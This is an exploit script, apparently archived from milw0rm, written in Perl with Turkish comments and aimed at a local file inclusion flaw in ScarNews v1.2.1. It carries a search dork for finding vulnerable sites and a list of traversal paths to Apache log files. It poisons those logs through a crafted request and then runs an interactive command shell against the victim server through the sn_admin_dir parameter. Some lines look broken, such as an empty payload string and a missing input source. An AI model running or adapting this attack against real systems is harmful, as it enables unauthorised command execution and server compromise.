#Perl # #BeyazKurt # #ScarNews (sn_admin_dir) Local File Inclusion Exploit # # D0rk : "Powered by ScarNews v1.2.1" dorka gerenk yok ama nese :p # kodlad...m 2 scriptte di.er makinayla uctu :( :( # #Str0ke üzme kendini olur böle .eler :) # #Download : http://www.scar4u.de/scripts/scarnews/download.html # #Coded by elden ele geçio :) # # Shikaa get türkçe kas :D bi laf anlatcaz anlam.on a.g nese hotmail xss'leri sömür sömürebild.in #kadar :D # use IO::Socket; use LWP::Simple; #ripped @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); if (@ARGV < 3) { print " ScarNews (sn_admin_dir) Local File Inclusion Exploit ############################################################### Kullan.m : exploit.pl [victim] [apachepath] ############################################################### "; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "Code is injecting in logfiles...\n"; $CODE=""; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n"; print $socket "GET ".$path.$CODE." HTTP/1.1\r\n"; print $socket "user-Agent: ".$CODE."\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "Write END to exit!\n"; print "If not working try another apache path\n\n"; print "[shell] ";$cmd = ; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n"; #now include parameter print $socket "GET ".$path."scarnews.inc.php?sn_admin_dir=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = ; } # milw0rm.com [2007-04-08]